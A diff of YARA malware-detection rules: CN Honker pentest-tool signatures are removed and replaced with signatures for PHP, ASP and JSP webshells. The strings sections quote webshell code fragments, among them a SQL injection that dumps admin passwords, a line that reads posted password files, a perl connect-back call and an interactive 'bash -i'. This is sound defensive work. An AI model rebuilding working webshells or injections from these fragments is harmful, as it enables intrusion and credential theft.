-		modified = "2023-12-05"
-		reference = "https://twitter.com/ESETresearch/status/1503436420886712321?s=20&t=xh8JK6fEmRIrnqO7Ih_PNg"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_caddywiper.yar#L2-L22"
+		id = "1d4a95c4-8128-504d-958f-dcc5c68f4975"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6360-L6375"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d0278596010953e7068979c92a33dc0ace1bfa94979077412128d1ca756f834"
-		score = 85
+		hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"
+		logic_hash = "52dc0449c205ff9105e2dedc3cb4858f83a2efc7bae579656a26da493dc59500"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "1e87e9b5ee7597bdce796490f3ee09211df48ba1d11f6e2f5b255f05cc0ba176"
-		hash2 = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea"
-		hash3 = "ea6a416b320f32261da8dafcf2faf088924f99a3a84f7b43b964637ea87aef72"
-		hash4 = "f1e8844dbfc812d39f369e7670545a29efef6764d673038b1c3edd11561d6902"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$op1 = { ff 55 94 8b 45 fc 50 ff 55 f8 8a 4d ba 88 4d ba 8a 55 ba 80 ea 01 }
-		$op2 = { 89 45 f4 83 7d f4 00 74 04 eb 47 eb 45 6a 00 8d 95 1c ff ff ff 52 }
-		$op3 = { 6a 20 6a 02 8d 4d b0 51 ff 95 68 ff ff ff 85 c0 75 0a e9 4e 02 00 00 }
-		$op4 = { e9 67 01 00 00 83 7d f4 05 74 0a e9 5c 01 00 00 e9 57 01 00 00 8d 45 98 50 6a 20 }
+		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
+		$s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword
+		$s13 = "header(\"Content-type: image/gif\");" fullword
+		$s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword
+		$s20 = "if (isset($_GET['rename_all'])) {" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and 3 of them or all of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_MAC_IPMAC : FILE
+rule SIGNATURE_BASE_Webshell_Qsd_Php_Backdoor
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe"
+		description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5424d3a7-765a-5dfb-9177-d5633f83079f"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L10-L26"
+		id = "f8208851-159c-5d0b-91ad-478aeb4fc9fd"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6376-L6390"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "24d55b6bec5c9fff4cd6f345bacac7abadce1611"
-		logic_hash = "395dfb840346bbf3f68fa198e76349cf65c703b28fd168b85d846d07df1845fe"
-		score = 70
+		hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"
+		logic_hash = "3ef7b67cd60370a99fdfa6fd614f71ee314af27c9d983383dde8f03a127a28b3"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Http://Www.YrYz.Net" fullword wide
-		$s2 = "IpMac.txt" fullword ascii
-		$s3 = "192.168.0.1" fullword ascii
+		$s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"
+		$s2 = "if(isset($_POST[\"newcontent\"]))" fullword
+		$s3 = "foreach($parts as $val)//Assemble the path back together" fullword
+		$s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 267KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Getsyskey : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Spygrup
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
+		description = "PHP Webshells Github Archive - file spygrup.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L28-L43"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6391-L6405"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
-		logic_hash = "1f12ea9d62d4aaf695328fb335445f3dae3996595402586d2ee52098e6727d10"
-		score = 70
+		hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"
+		logic_hash = "5981f8cc1a98f799b1573cf73297383f995acf1c40f0227ac10302dc4d6fd6cc"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii
-		$s4 = "The system key file \"%s\" is created." fullword ascii
+		$s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword
+		$s6 = "if($_POST['root']) $root = $_POST['root'];" fullword
+		$s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword
+		$s18 = "By KingDefacer From Spygrup.org>" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Churrasco : FILE
+rule SIGNATURE_BASE_Webshell_Web_Shell__C_Shankar
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe"
+		description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "58873cd6-0c9e-58a0-923a-aca8a1d42017"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L45-L64"
+		id = "966f5580-21c5-5ecf-b500-bde3d1ba4494"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6406-L6420"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5a3c935d82a5ff0546eff51bb2ef21c88198f5b8"
-		logic_hash = "f60589bda76367578388cbe6af912c80c9364a7047ed52ca2b4156a1b277e7ca"
-		score = 70
+		hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"
+		logic_hash = "9d320eed18a5d76a87cee4ea0fa9caf08f096f7eeaab55420540aa082b596e0f"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "HEAD9 /" ascii
-		$s1 = "logic_er" fullword ascii
-		$s6 = "proggam" fullword ascii
-		$s16 = "DtcGetTransactionManagerExA" fullword ascii
-		$s17 = "GetUserNameA" fullword ascii
-		$s18 = "OLEAUT" fullword ascii
+		$s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
+		$s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"
+		$s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
+		$s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1276KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Mysql_Injectv1_1_Creak : FILE
+rule SIGNATURE_BASE_Webshell_Ayyildiz_Tim___AYT__Shell_V_2_1_Biz
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file mysql_injectV1.1_Creak.exe"
+		description = "PHP Webshells Github Archive - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "39025a57-557a-53c0-bfdb-81fe83f824af"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L66-L81"
+		id = "fdd9bae9-80f3-5200-b922-e7d194009af8"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6421-L6435"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a1f066789f48a76023598c5777752c15f91b76b0"
-		logic_hash = "f61557216a7e90ff9655ad8aea4a9adf0e4435c7a3f7958423e46fd2265bad07"
-		score = 70
+		hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"
+		logic_hash = "2d096baad162c0e3e01732007a3be2804155e614a8fa4cd2d5dd3a7ac808fb49"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "1http://192.169.200.200:2217/mysql_inject.php?id=1" fullword ascii
-		$s12 = "OnGetPassword" fullword ascii
+		$s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword
+		$s11 = "directory... Trust me - it works :-) */" fullword
+		$s15 = "/* ls looks much better with ' -F', IMHO. */" fullword
+		$s16 = "} else if ($command == 'ls') {" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5890KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_ASP_Wshell : FILE
+rule SIGNATURE_BASE_Webshell_Gamma_Web_Shell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file wshell.txt"
+		description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "028136cd-129b-5d58-a4c2-ba730a798c06"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L83-L100"
+		id = "43b4fc9f-8897-5553-8846-29d307efa885"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6436-L6450"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3ae33c835e7ea6d9df74fe99fcf1e2fb9490c978"
-		logic_hash = "f6f83acb76248a1b00f1acac621e68888c93b34d4813d8f8613d5d9095c53a8a"
-		score = 70
+		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
+		logic_hash = "1de868c4948a95272d288aeba3ac38b84bf6b33ede6b3b600b32530c85586404"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
-		$s1 = "UserPass="
-		$s2 = "VerName="
-		$s3 = "StateName="
+		$s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword
+		$s8 = "### Gamma Group <http://www.gammacenter.com>" fullword
+		$s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword
+		$s20 = "my $command = $self->query('command');" fullword
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 200KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Exp_Iis7 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Aspydrv
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file iis7.exe"
+		description = "PHP Webshells Github Archive - file aspydrv.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "edfafc9a-032a-5ccb-9a1f-faeab0dfa31d"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L102-L119"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6451-L6466"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
-		logic_hash = "91ceec96297e5cc027e261fd708899787b9be4ac15e209e0734a3b8563ae31b5"
-		score = 70
+		hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"
+		logic_hash = "314fd671b163b9904cc78cb3a5858f5b1e3dfae9d520d5ebc545a7abd922e9f7"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\\\localhost" fullword ascii
-		$s1 = "iis.run" fullword ascii
-		$s3 = ">Could not connecto %s" fullword ascii
-		$s4 = "WinSta0\\Default" fullword ascii
+		$s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files"
+		$s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
+		$s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
+		$s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
+		$s20 = "' ---Copy Too Folder routine Start" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Segmentweapon : FILE
+rule SIGNATURE_BASE_Webshell_Jspwebshell_1_2_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SegmentWeapon.exe"
+		description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1b6f721-4c4d-50f2-9ed6-f38e8e7ea4ab"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L121-L136"
+		id = "659f5c7d-0a9c-554d-a0ad-e3bcb8c5a1e9"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6467-L6482"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "494ef20067a7ce2cc95260e4abc16fcfa7177fdf"
-		logic_hash = "9afb70a3ae158b7abbda6725b8c9901121b78fa0e874db12b4ac08bf59b26fb5"
-		score = 70
+		hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"
+		logic_hash = "41d937fce969a850a2e4e07eb168becc96a036317a78d620e812707be9466dfc"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "C:\\WINDOWS\\system32\\msvbvm60.dll\\3" fullword ascii
-		$s1 = "http://www.nforange.com/inc/1.asp?" fullword wide
+		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
+		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
+		$s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
+		$s15 = "endPoint=random1.getFilePointer();" fullword
+		$s20 = "if (request.getParameter(\"command\") != null) {" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Alien_Iispwd : FILE
+rule SIGNATURE_BASE_Webshell_G00Nshell_V1_3
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs"
+		description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e561c548-c656-5528-a2a8-2798a59ac6bf"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L138-L153"
+		id = "61a09576-7e62-5a30-a52c-492b81b96322"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6483-L6498"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5d157a1b9644adbe0b28c37d4022d88a9f58cedb"
-		logic_hash = "16dc6ec4b668fdc43e3a9a8ea31ad0caa1a80b1015ab60eec0eb76bfacd69c5f"
-		score = 70
+		hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"
+		logic_hash = "2ecb3ce2aa43a99552fb26e610c35bdb04f4ff0dc75c867e4327d6e27eed0177"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii
-		$s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii
+		$s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
+		$s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
+		$s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
+		$s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
+		$s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
 
 	condition:
-		filesize < 3KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Md5Cracktools : FILE
+rule SIGNATURE_BASE_Webshell_Winx_Shell_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe"
+		description = "PHP Webshells Github Archive - file WinX Shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "16e04a66-0f6f-5b94-97c3-df62aa9406a9"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L155-L170"
+		id = "ebad4f2e-96c3-5cb7-b228-de3a6a39ae55"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		old_rule_name = "WebShell_WinX_Shell"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6499-L6515"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9dfd9c9923ae6f6fe4cbfa9eb69688269285939c"
-		logic_hash = "a176393c0324bcc634a31c261aa6b528fb5a5893c40a5534b34253a1922c8285"
-		score = 70
+		hash = "a94d65c168344ad9fa406d219bdf60150c02010e"
+		logic_hash = "f953c297763e41d197ce186dc818b656951dfa8c855c5063fc4abb54eeefc7bb"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s2 = ",<a href='index.php?c=1&type=md5&hash=" fullword ascii
+		$s4 = "// It's simple shell for all Win OS." fullword
+		$s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword
+		$s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword
+		$s13 = "// Created by greenwood from n57" fullword
+		$s20 = " if (is_uploaded_file($userfile)) {" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4580KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Coolscan_Scan : FILE
+rule SIGNATURE_BASE_Webshell_PHANTASMA
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file scan.exe"
+		description = "PHP Webshells Github Archive - file PHANTASMA.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "781446d2-3363-56c3-9767-c7ac70047b68"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L172-L187"
+		id = "b36a7dbb-7d40-5fca-8409-c8822298005c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6516-L6530"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e1c5fb6b9f4e92c4264c7bea7f5fba9a5335c328"
-		logic_hash = "89c7d24d821e907f79ab5630eed13275c5216cff6bf203b5c8f66bb1a178039b"
-		score = 70
+		hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"
+		logic_hash = "355be62807182f9a53bac20a6dead8f0a3bee83b6bdc4566502c157f16076b9b"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii
-		$s1 = "scan web.exe" fullword wide
+		$s12 = "\"    printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword
+		$s15 = "if ($portscan != \"\") {" fullword
+		$s16 = "echo \"<br>Banner: $get <br><br>\";" fullword
+		$s20 = "$dono = get_current_user( );" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3680KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Mempodipper2_6 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Webshells_Cw
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file mempodipper2.6.39"
+		description = "PHP Webshells Github Archive - file cw.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "43a27968-adab-5f27-9b8c-8f0f895f0576"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L189-L203"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6531-L6547"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ba2c79911fe48660898039591e1742b3f1a9e923"
-		logic_hash = "1a2c42757199818b94a73b9faff3380911655992ef3214a33a220eac15850c4b"
-		score = 70
+		hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"
+		logic_hash = "52bfb14f4d5d3df787ce7782cbbee25ea1556758eed48e3001c8a3f35a541526"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed" ascii
+		$s1 = "// Dump Database [pacucci.com]" fullword
+		$s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword
+		$s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword
+		$s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"
+		$s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword
+		$s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword
 
 	condition:
-		filesize < 30KB and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_COOKIE_Cookie : FILE
+rule SIGNATURE_BASE_Webshell_Php_Include_W_Shell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file CooKie.exe"
+		description = "PHP Webshells Github Archive - file php-include-w-shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5f85bb0f-6df2-512c-ba1a-8a74c1a55563"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L205-L220"
+		id = "a80ca446-6612-51b4-99a7-8a8d8e6ee196"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L6548-L6561"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f7727160257e0e716e9f0cf9cdf9a87caa986cde"
-		logic_hash = "6d942e53a253cb157e535f86ca457c93a6039b2c5ebb3969dc3e271242b478d4"
-		score = 70
+		hash = "1a7f4868691410830ad954360950e37c582b0292"
+		logic_hash = "2be144060d4fdaee38214dc2eba80c2a6fd3699060d274e66356fd5a08c9be4b"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii
-		$s5 = "CooKie.exe" fullword wide
+		$s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
+		$s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
+		$s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 360KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Wwwscan_1_Wwwscan : FILE
+rule SIGNATURE_BASE_Webshell_Mysql_Tool
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
+		description = "PHP Webshells Github Archive - file mysql_tool.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b6a94a3-6f9c-59b2-931b-c06701b95d59"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
